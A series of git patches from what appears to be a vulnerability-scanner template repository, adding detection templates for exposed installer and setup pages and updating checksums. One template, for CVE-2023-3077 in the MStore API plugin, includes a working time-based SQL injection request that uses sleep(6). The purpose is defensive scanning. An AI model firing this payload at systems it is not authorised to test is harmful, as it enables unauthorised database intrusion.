Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 14:11:54 +0530 Subject: [PATCH 349/847] fix template --- http/cves/2023/CVE-2023-3077.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 2a61a79863..7cefd1f336 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -1,7 +1,7 @@ id: CVE-2023-3077 info: - name: MStore API < 3.9.8 - Unauthenticated Blind SQL Injection + name: MStore API < 3.9.8 - SQL Injection author: DhiyaneshDK severity: critical description: | @@ -21,12 +21,13 @@ info: epss-percentile: 0.50816 cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:* metadata: - verified: treu + max-request: 2 + verified: true vendor: inspireui product: mstore_api framework: wordpress publicwww-query: "/wp-content/plugins/mstore-api/" - tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api + tags: cve,cve2023,wpscan,wordpress,wp-plugin,wp,mstore-api,sqli flow: http(1) && http(2) @@ -43,9 +44,11 @@ http: - 'contains(body, "MStore API")' condition: and - - method: GET - path: - - "{{BaseURL}}/wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+-" + - raw: + - | + @timeout: 15s + GET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1 + Host: {{Hostname}} matchers: - type: dsl From d13b2d1a624ad01609b6d40ce241d1b4dd19b9bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:42:26 +0000 Subject: [PATCH 350/847] Auto Template Signing [Tue May 28 08:42:26 UTC 2024] :robot: --- http/misconfiguration/installer/fleetcart-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/fleetcart-installer.yaml b/http/misconfiguration/installer/fleetcart-installer.yaml index 5f1c3542a1..b682e038cc 100644 --- a/http/misconfiguration/installer/fleetcart-installer.yaml +++ b/http/misconfiguration/installer/fleetcart-installer.yaml @@ -29,3 +29,4 @@ http: - type: status status: - 200 +# digest: 4b0a004830460221009dbdb0636df294b6b48c1eb7dfc061a7aa3c85c960f99c89ab56e7e7487e59df022100db0e9e47e99f04040df638b39232702e72eb96e41d16fa63b5b698419b926bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From c4fa4f50157b59dc6d638e1dca342025616de362 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:58:24 +0000 Subject: [PATCH 351/847] Auto Generated New Template Addition List [Tue May 28 08:58:24 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 088d1e3152..b837ae98d7 100644 --- a/.new-additions +++ b/.new-additions @@ -2,6 +2,7 @@ http/cnvd/2024/CNVD-2024-15077.yaml http/cves/2022/CVE-2022-1580.yaml http/cves/2022/CVE-2022-34534.yaml http/cves/2023/CVE-2023-2059.yaml +http/cves/2023/CVE-2023-3077.yaml http/cves/2023/CVE-2023-48084.yaml http/cves/2024/CVE-2024-21683.yaml http/cves/2024/CVE-2024-5230.yaml From 34fed58f818136b78ba104dc9ac38e11d72d63b2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 08:58:29 +0000 Subject: [PATCH 352/847] Auto Generated Templates Checksum [Tue May 28 08:58:29 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4d36c324bc..6098fa1085 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3028,6 +3028,7 @@ http/cves/2023/CVE-2023-30256.yaml:c8ff7db1046cfba64af40cf83389cb0aecad9dd6 http/cves/2023/CVE-2023-30258.yaml:778e4e61140adf7c5254116c77fc8a4ae90c59db http/cves/2023/CVE-2023-30534.yaml:1e7e038bd6a2c2f5cba13e80bcd1a2ce1faea3c5 http/cves/2023/CVE-2023-30625.yaml:07288271ea2118572d231f5b97192b928d4adc41 +http/cves/2023/CVE-2023-3077.yaml:abb40e9faaf7e46431f44b4c248a1c48b6bb5287 http/cves/2023/CVE-2023-30777.yaml:84e1a81ce9f0ad56c8dc4249cab724697ea91a80 http/cves/2023/CVE-2023-30868.yaml:0d890bae91b41fa1b84588722fb8d9e6aa45b3c8 http/cves/2023/CVE-2023-30943.yaml:0d69bdceb77a742047c6c51eb8990082f537a68c @@ -5423,7 +5424,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea -http/misconfiguration/installer/fleetcart-installer.yaml:74f546acf0efc56a070cc599f27750eb435a424c +http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a @@ -8574,7 +8575,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:34021addf8a4e019d1b4fbd148bbb25b5d32e69e +templates-checksum.txt:79dc057904896924eda5d56bff18c87ffc191c34 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2a887f4aae8ee4d06a619ba233546f1734309269 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 08:59:29 +0000 Subject: [PATCH 353/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4cee8c2b81..b19db68056 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -7,6 +7,7 @@ on: - 'http/cves/2022/CVE-2022-1580.yaml' - 'http/cves/2022/CVE-2022-34534.yaml' - 'http/cves/2023/CVE-2023-2059.yaml' + - 'http/cves/2023/CVE-2023-3077.yaml' - 'http/cves/2023/CVE-2023-48084.yaml' - 'http/cves/2024/CVE-2024-21683.yaml' - 'http/cves/2024/CVE-2024-5230.yaml' From eafcbc69c56af1319d90a43a35225ec51d43b2dd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 09:00:03 +0000 Subject: [PATCH 354/847] Auto Template Signing [Tue May 28 09:00:03 UTC 2024] :robot: --- http/cves/2023/CVE-2023-3077.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-3077.yaml b/http/cves/2023/CVE-2023-3077.yaml index 7cefd1f336..c30c0baedf 100644 --- a/http/cves/2023/CVE-2023-3077.yaml +++ b/http/cves/2023/CVE-2023-3077.yaml @@ -56,3 +56,4 @@ http: - 'duration>=6' - 'status_code == 200' condition: and +# digest: 4b0a00483046022100c0dcbeb57b4e99aa73a40a91cba812a27203182bca95ab6b14d25f64a6a6cedc022100f9d201151cf04d6e74c390f8a539f56663322adfec3fd01c59b4a895a124695f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 31d008008e53b26c490ad019a5212f169b0b05fd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 14:33:13 +0530 Subject: [PATCH 355/847] Create flarum-installer.yaml --- .../installer/flarum-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/flarum-installer.yaml diff --git a/http/misconfiguration/installer/flarum-installer.yaml b/http/misconfiguration/installer/flarum-installer.yaml new file mode 100644 index 0000000000..f7df6feb30 --- /dev/null +++ b/http/misconfiguration/installer/flarum-installer.yaml @@ -0,0 +1,33 @@ +id: flarum-installer + +info: + name: Flarum Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Flarum installation pages which could allow unauthorized access or information disclosure. + reference: + - https://flarum.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Install Flarum" + tags: misconfig,install,exposure,flarum + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install Flarum" + - "Admin Password" + condition: and + + - type: status + status: + - 200 From 9b20134f147abc6b6d003e4809e65cadf0392518 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 28 May 2024 14:42:15 +0530 Subject: [PATCH 356/847] Create busybox-repository-browser.yaml --- .../busybox-repository-browser.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/exposed-panels/busybox-repository-browser.yaml diff --git a/http/exposed-panels/busybox-repository-browser.yaml b/http/exposed-panels/busybox-repository-browser.yaml new file mode 100644 index 0000000000..c1a5b6144e --- /dev/null +++ b/http/exposed-panels/busybox-repository-browser.yaml @@ -0,0 +1,33 @@ +id: busybox-repository-browser + +info: + name: Busybox Repository Browser - Detect + author: ritikchaddha + severity: info + description: | + Busybox Repository Browser was detected. + reference: + - https://github.com/mirror/busybox + metadata: + max-request: 1 + verified: true + fofa-query: title="Busybox Repository Browser" + tags: detect,busybox,oss + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Busybox Repository Browser" + - "index" + condition: and + + - type: status + status: + - 200 From 13e35b43d8d5b921ff326f6b2e13a18a0a24815c Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 09:13:22 +0000 Subject: [PATCH 357/847] Auto Generated New Template Addition List [Tue May 28 09:13:22 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b837ae98d7..1568df1e30 100644 --- a/.new-additions +++ b/.new-additions @@ -10,6 +10,7 @@ http/default-logins/cambium-networks/cambium-networks-default-login.yaml http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml http/exposed-panels/cisco-firepower-panel.yaml http/exposed-panels/vrealize-hyperic-login-panel.yaml +http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml http/technologies/gotweb-detect.yaml From 79bbc7a9a3869a99950de6cc54afab886d67e928 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 09:13:31 +0000 Subject: [PATCH 358/847] Auto Generated Templates Checksum [Tue May 28 09:13:31 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6098fa1085..17950f6572 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3028,7 +3028,7 @@ http/cves/2023/CVE-2023-30256.yaml:c8ff7db1046cfba64af40cf83389cb0aecad9dd6 http/cves/2023/CVE-2023-30258.yaml:778e4e61140adf7c5254116c77fc8a4ae90c59db http/cves/2023/CVE-2023-30534.yaml:1e7e038bd6a2c2f5cba13e80bcd1a2ce1faea3c5 http/cves/2023/CVE-2023-30625.yaml:07288271ea2118572d231f5b97192b928d4adc41 -http/cves/2023/CVE-2023-3077.yaml:abb40e9faaf7e46431f44b4c248a1c48b6bb5287 +http/cves/2023/CVE-2023-3077.yaml:d3b8b7a4a10118402a6d5118a60abf75a01c954c http/cves/2023/CVE-2023-30777.yaml:84e1a81ce9f0ad56c8dc4249cab724697ea91a80 http/cves/2023/CVE-2023-30868.yaml:0d890bae91b41fa1b84588722fb8d9e6aa45b3c8 http/cves/2023/CVE-2023-30943.yaml:0d69bdceb77a742047c6c51eb8990082f537a68c @@ -5424,6 +5424,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea +http/misconfiguration/installer/flarum-installer.yaml:f2e2c800673831cb7a4ea8053f2e45d2a93e39bb http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc @@ -8575,7 +8576,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:79dc057904896924eda5d56bff18c87ffc191c34 +templates-checksum.txt:64c35ec6a109228def6cb0555862542b66f1416b wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2e0f220cc717ab632826d76c7ebf3a77f5eeb766 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 09:14:03 +0000 Subject: [PATCH 359/847] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index b19db68056..391b388721 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -15,6 +15,7 @@ on: - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml' - 'http/exposed-panels/cisco-firepower-panel.yaml' - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml' + - 'http/misconfiguration/installer/flarum-installer.yaml' - 'http/misconfiguration/installer/fleetcart-installer.yaml' - 'http/misconfiguration/installer/openemr-setup-installer.yaml' - 'http/technologies/gotweb-detect.yaml' From 972555cbb6fd3d643512d00a3e08b0c64da7b22e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 09:15:12 +0000 Subject: [PATCH 360/847] Auto Template Signing [Tue May 28 09:15:12 UTC 2024] :robot: --- http/misconfiguration/installer/flarum-installer.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/installer/flarum-installer.yaml b/http/misconfiguration/installer/flarum-installer.yaml index f7df6feb30..1e193e60ca 100644 --- a/http/misconfiguration/installer/flarum-installer.yaml +++ b/http/misconfiguration/installer/flarum-installer.yaml @@ -31,3 +31,4 @@ http: - type: status status: - 200 +# digest: 4b0a00483046022100a3a5d3a8238918dd30f56b955dac4e3894fc39f4b12f41cc159e85a4e1567cbc0221009d6fe3368105a04c4f4701624cf092058c33431daa499dec912343e00a2744b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From f7723fe2a9f78c7ecfe9f172980e68550dfd50cb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 14:48:28 +0530 Subject: [PATCH 361/847] Create stackposts-installer.yaml --- .../installer/stackposts-installer.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/installer/stackposts-installer.yaml diff --git a/http/misconfiguration/installer/stackposts-installer.yaml b/http/misconfiguration/installer/stackposts-installer.yaml new file mode 100644 index 0000000000..08781a7f4a --- /dev/null +++ b/http/misconfiguration/installer/stackposts-installer.yaml @@ -0,0 +1,32 @@ +id: stackposts-installer + +info: + name: StackPosts Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed StackPosts installation page. + reference: + - https://codecanyon.net/item/stackposts-social-marketing-tool/21747459 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Install - StackPosts" + fofa-query: icon_hash="700046539" + tags: misconfig,install,exposure,stackposts + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install - StackPosts - Social Marketing Tools" + + - type: status + status: + - 200 From b829ae2a3d056f052021f5cd27e3943842177f88 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 14:53:14 +0530 Subject: [PATCH 362/847] Create librenms-installer.yaml --- .../installer/librenms-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/librenms-installer.yaml diff --git a/http/misconfiguration/installer/librenms-installer.yaml b/http/misconfiguration/installer/librenms-installer.yaml new file mode 100644 index 0000000000..07e0c9cbf8 --- /dev/null +++ b/http/misconfiguration/installer/librenms-installer.yaml @@ -0,0 +1,31 @@ +id: librenms-installer + +info: + name: LibreNMS Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed LibreNMS installation page. + reference: + - https://docs.librenms.org/Installation/Install-LibreNMS/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"LibreNMS Install" + tags: misconfig,install,exposure,librenms + +http: + - method: GET + path: + - "{{BaseURL}}/install/checks" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "LibreNMS Install" + + - type: status + status: + - 200 From cb840f9a4f208999367c88b006b07843cc05dcdc Mon Sep 17 00:00:00 2001 From: Mohammad D Date: Tue, 28 May 2024 14:27:25 +0330 Subject: [PATCH 363/847] Update tech-detect.yaml & add clickhouse --- http/technologies/tech-detect.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 21d19515ab..3840e0efa9 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -3726,4 +3726,11 @@ http: part: server words: - "istio-envoy" + + - type: word + name: clickhouse + part: header + words: + - "X-ClickHouse-Summary" + case-insensitive: true # digest: 4b0a00483046022100ba8d6eae9311c902babb5fce09a84ba79bb0317dbf6caca514245e0c60a3b3520221009ce0d2c9c1144d45590bfed8ab4c81f6bde45a053a2b3156d25bdb4aba006253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4234d76420c997be44c555479b9a2327a0220a39 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 16:42:58 +0530 Subject: [PATCH 364/847] Create projectsend-installer.yaml --- .../installer/projectsend-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/projectsend-installer.yaml diff --git a/http/misconfiguration/installer/projectsend-installer.yaml b/http/misconfiguration/installer/projectsend-installer.yaml new file mode 100644 index 0000000000..4a0eef8ebb --- /dev/null +++ b/http/misconfiguration/installer/projectsend-installer.yaml @@ -0,0 +1,31 @@ +id: projectsend-installer + +info: + name: ProjectSend Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed ProjectSend installation page. + reference: + - https://www.projectsend.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"ProjectSend setup" + tags: misconfig,install,exposure,projectsend + +http: + - method: GET + path: + - "{{BaseURL}}/install/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install » ProjectSend" + + - type: status + status: + - 200 From f77f55b05eefe1a91b67231862428e1c8623c469 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 16:47:07 +0530 Subject: [PATCH 365/847] Create ubersmith-installer.yaml --- .../installer/ubersmith-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/ubersmith-installer.yaml diff --git a/http/misconfiguration/installer/ubersmith-installer.yaml b/http/misconfiguration/installer/ubersmith-installer.yaml new file mode 100644 index 0000000000..f8b8218812 --- /dev/null +++ b/http/misconfiguration/installer/ubersmith-installer.yaml @@ -0,0 +1,31 @@ +id: ubersmith-installer + +info: + name: Ubersmith Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Ubersmith Setup page. + reference: + - https://ubersmith.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Ubersmith Setup" + tags: misconfig,install,exposure,ubersmith + +http: + - method: GET + path: + - "{{BaseURL}}/setup/index.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Ubersmith Setup" + + - type: status + status: + - 200 From 0b1b79ab351bac6a550e7fb6a79a7905fa4b8c62 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 11:26:19 +0000 Subject: [PATCH 367/847] Auto Generated Templates Checksum [Tue May 28 11:26:18 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 17950f6572..159e8e8e13 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5424,7 +5424,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea -http/misconfiguration/installer/flarum-installer.yaml:f2e2c800673831cb7a4ea8053f2e45d2a93e39bb +http/misconfiguration/installer/flarum-installer.yaml:b7ee710c481aa3675092568601ea31b522313b39 http/misconfiguration/installer/fleetcart-installer.yaml:dea791b407e94992fd22b6b781bffbdc07358fcb http/misconfiguration/installer/forgejo-installer.yaml:4438f54db2524ab11b7d2f0544d3f75c89feb83a http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc @@ -6981,7 +6981,7 @@ http/technologies/swag-instance-default-page.yaml:d4643f41f726f357460d39fa02b869 http/technologies/switch-protocol.yaml:9e7d35889c050f18a43fdfd29498913b84878b6a http/technologies/synology-web-station.yaml:28d3a14c78cde632ddbed93de03148cffb1b3fb6 http/technologies/tableau-server-detect.yaml:6e0417d43e7d6773330d82b6088270c9004a8daa -http/technologies/tech-detect.yaml:8da8bdae62f4f497e27b797a3571dab0e2c7e579 +http/technologies/tech-detect.yaml:163c42d19380ed74df154d367227f372929d032e http/technologies/telerik/telerik-dialoghandler-detect.yaml:28ede6444f34199767b36a8317d80eb705805366 http/technologies/telerik/telerik-fileupload-detect.yaml:eb5db507fb5a1c3bfba3651c389c4e8b175ca2d1 http/technologies/teradici-pcoip.yaml:710bd965305a025c6f8793f5e3e13fa2117212ad @@ -8576,7 +8576,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:64c35ec6a109228def6cb0555862542b66f1416b +templates-checksum.txt:b52d136fba4351a25542d30e38b49e40e39323d5 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e9e237db4dc05dffc3931186c70f6d1f1e31546f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 May 2024 11:28:01 +0000 Subject: [PATCH 368/847] Auto Template Signing [Tue May 28 11:28:01 UTC 2024] :robot: --- http/technologies/tech-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/technologies/tech-detect.yaml b/http/technologies/tech-detect.yaml index 3840e0efa9..376458562a 100644 --- a/http/technologies/tech-detect.yaml +++ b/http/technologies/tech-detect.yaml @@ -3733,4 +3733,4 @@ http: words: - "X-ClickHouse-Summary" case-insensitive: true -# digest: 4b0a00483046022100ba8d6eae9311c902babb5fce09a84ba79bb0317dbf6caca514245e0c60a3b3520221009ce0d2c9c1144d45590bfed8ab4c81f6bde45a053a2b3156d25bdb4aba006253:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206435742292b7b33283b264123be82c44d4f4102132875d35561296cd0c603c9d02202578a061dcb35c3284cadf8c815d7831fce13d645643c27a1fcd779925f0e56c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 10ee5ab954d6484a3aa3a226f2a55db8ae4d81e9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 17:21:18 +0530 Subject: [PATCH 369/847] Create snipe-it-installer.yaml --- .../installer/snipe-it-installer.yaml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 http/misconfiguration/installer/snipe-it-installer.yaml diff --git a/http/misconfiguration/installer/snipe-it-installer.yaml b/http/misconfiguration/installer/snipe-it-installer.yaml new file mode 100644 index 0000000000..d3646c227e --- /dev/null +++ b/http/misconfiguration/installer/snipe-it-installer.yaml @@ -0,0 +1,33 @@ +id: snipe-it-installer + +info: + name: Snipe-IT Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Snipe-IT Setup page. + reference: + - https://snipeitapp.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Snipe-IT Setup" + tags: misconfig,install,exposure,snipe-it + +http: + - method: GET + path: + - "{{BaseURL}}/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Snipe-IT Setup" + - "Create Admin User" + condition: and + + - type: status + status: + - 200 From 7f1cea6892886a791034358700c642f91ddfe13a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 17:25:03 +0530 Subject: [PATCH 370/847] Create justfans-installer.yaml --- .../installer/justfans-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/justfans-installer.yaml diff --git a/http/misconfiguration/installer/justfans-installer.yaml b/http/misconfiguration/installer/justfans-installer.yaml new file mode 100644 index 0000000000..14ec8c2232 --- /dev/null +++ b/http/misconfiguration/installer/justfans-installer.yaml @@ -0,0 +1,31 @@ +id: justfans-installer + +info: + name: JustFans Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed JustFans Setup page. + reference: + - https://codecanyon.net/item/justfans-premium-content-creators-saas-platform/35154898 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Install the script - JustFans" + tags: misconfig,install,exposure,justfans + +http: + - method: GET + path: + - "{{BaseURL}}/install" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Install the script - JustFans" + + - type: status + status: + - 200 From 0f3720ac7ea96338a5919ded56a718c741ae1ec2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 May 2024 17:29:12 +0530 Subject: [PATCH 371/847] Create invoice-ninja-installer.yaml --- .../installer/invoice-ninja-installer.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/misconfiguration/installer/invoice-ninja-installer.yaml diff --git a/http/misconfiguration/installer/invoice-ninja-installer.yaml b/http/misconfiguration/installer/invoice-ninja-installer.yaml new file mode 100644 index 0000000000..93c12f260b --- /dev/null +++ b/http/misconfiguration/installer/invoice-ninja-installer.yaml @@ -0,0 +1,31 @@ +id: invoice-ninja-installer + +info: + name: Invoice Ninja Setup Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Detects exposed Invoice Ninja Setup page. + reference: + - https://invoiceninja.com/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"Invoice Ninja Setup" + tags: misconfig,install,exposure,invoice + +http: + - method: GET + path: + - "{{BaseURL}}/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Invoice Ninja Setup" + + - type: status + status: + - 200 From f7204daf8c8f63fef597afee202b937a5a6b8f6d Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 28 May 2024 12:38:50 +0000 Subject: [PATCH 372/847] Auto Generated New Template Addition List [Tue May 28 12:38:50 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 1568df1e30..96659358aa 100644 --- a/.new-additions +++ b/.new-additions @@ -13,6 +13,7 @@ http/exposed-panels/vrealize-hyperic-login-panel.yaml http/misconfiguration/installer/flarum-installer.yaml http/misconfiguration/installer/fleetcart-installer.yaml http/misconfiguration/installer/openemr-setup-installer.yaml +http/misconfiguration/installer/projectsend-installer.yaml http/technologies/gotweb-detect.yaml http/vulnerabilities/other/array-vpn-lfi.yaml 